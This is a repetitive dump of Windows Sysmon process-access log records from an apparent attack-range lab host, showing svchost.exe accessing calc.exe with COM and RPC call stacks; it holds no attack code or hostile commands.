22:12:48.155{8e433fbf-2a47-6013-6b00-000000001100}55328152C:\Windows\system32\svchost.exe{8e433fbf-36df-6013-a103-000000001100}10728C:\Windows\System32\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000360621Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:48.155{8e433fbf-2a47-6013-6b00-000000001100}55328152C:\Windows\system32\svchost.exe{8e433fbf-36df-6013-a103-000000001100}10728C:\Windows\System32\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+da15e|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd 10341000x8000000000000000360620Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:48.155{8e433fbf-2a47-6013-6b00-000000001100}55328152C:\Windows\system32\svchost.exe{8e433fbf-36df-6013-a103-000000001100}10728C:\Windows\System32\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000360619Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:48.155{8e433fbf-2a47-6013-6b00-000000001100}55328152C:\Windows\system32\svchost.exe{8e433fbf-36df-6013-a103-000000001100}10728C:\Windows\System32\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+da15e|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd 10341000x8000000000000000360618Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:48.155{8e433fbf-2a47-6013-6b00-000000001100}55328152C:\Windows\system32\svchost.exe{8e433fbf-36df-6013-a103-000000001100}10728C:\Windows\System32\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000360617Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:48.155{8e433fbf-2a47-6013-6b00-000000001100}55328152C:\Windows\system32\svchost.exe{8e433fbf-36df-6013-a103-000000001100}10728C:\Windows\System32\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+da15e|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd 10341000x8000000000000000360616Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:48.155{8e433fbf-2a47-6013-6b00-000000001100}55328152C:\Windows\system32\svchost.exe{8e433fbf-36df-6013-a103-000000001100}10728C:\Windows\System32\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000360615Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:48.155{8e433fbf-2a47-6013-6b00-000000001100}55328152C:\Windows\system32\svchost.exe{8e433fbf-36df-6013-a103-000000001100}10728C:\Windows\System32\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+da15e|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd 10341000x8000000000000000360614Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:48.155{8e433fbf-2a47-6013-6b00-000000001100}55328152C:\Windows\system32\svchost.exe{8e433fbf-36df-6013-a103-000000001100}10728C:\Windows\System32\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000360613Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:48.155{8e433fbf-2a47-6013-6b00-000000001100}55328152C:\Windows\system32\svchost.exe{8e433fbf-36df-6013-a103-000000001100}10728C:\Windows\System32\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+da15e|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd 10341000x8000000000000000360612Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:48.155{8e433fbf-2a47-6013-6b00-000000001100}55328152C:\Windows\system32\svchost.exe{8e433fbf-36df-6013-a103-000000001100}10728C:\Windows\System32\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000360611Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:48.155{8e433fbf-2a47-6013-6b00-000000001100}55328152C:\Windows\system32\svchost.exe{8e433fbf-36df-6013-a103-000000001100}10728C:\Windows\System32\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+da15e|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd 10341000x8000000000000000360610Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:48.155{8e433fbf-2a47-6013-6b00-000000001100}55328152C:\Windows\system32\svchost.exe{8e433fbf-36df-6013-a103-000000001100}10728C:\Windows\System32\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000360609Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:48.155{8e433fbf-2a47-6013-6b00-000000001100}55328152C:\Windows\system32\svchost.exe{8e433fbf-36df-6013-a103-000000001100}10728C:\Windows\System32\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+da15e|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd 10341000x8000000000000000360608Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:48.155{8e433fbf-2a47-6013-6b00-000000001100}55328152C:\Windows\system32\svchost.exe{8e433fbf-36df-6013-a103-000000001100}10728C:\Windows\System32\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000360607Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:48.155{8e433fbf-2a47-6013-6b00-000000001100}55328152C:\Windows\system32\svchost.exe{8e433fbf-36df-6013-a103-000000001100}10728C:\Windows\System32\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+da15e|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd 10341000x8000000000000000360606Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:48.155{8e433fbf-2a47-6013-6b00-000000001100}55328152C:\Windows\system32\svchost.exe{8e433fbf-36df-6013-a103-000000001100}10728C:\Windows\System32\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000360605Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:48.155{8e433fbf-2a47-6013-6b00-000000001100}55328152C:\Windows\system32\svchost.exe{8e433fbf-36df-6013-a103-000000001100}10728C:\Windows\System32\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+da15e|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd 10341000x8000000000000000360604Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:48.155{8e433fbf-2a47-6013-6b00-000000001100}55328152C:\Windows\system32\svchost.exe{8e433fbf-36df-6013-a103-000000001100}10728C:\Windows\System32\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000360603Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:48.155{8e433fbf-2a47-6013-6b00-000000001100}55328152C:\Windows\system32\svchost.exe{8e433fbf-36df-6013-a103-000000001100}10728C:\Windows\System32\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+da15e|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd 10341000x8000000000000000360602Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:48.155{8e433fbf-2a47-6013-6b00-000000001100}55328152C:\Windows\system32\svchost.exe{8e433fbf-36df-6013-a103-000000001100}10728C:\Windows\System32\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000360601Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:12:48.155{8e433fbf-2a47-6013-6b00-000000001100}55328152C:\Windows\system32\svchost.exe{8e433fbf-36df-6013-a103-000000001100}10728C:\Windows\System32\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+da15e|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd 10341000x8000000000000000360600Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 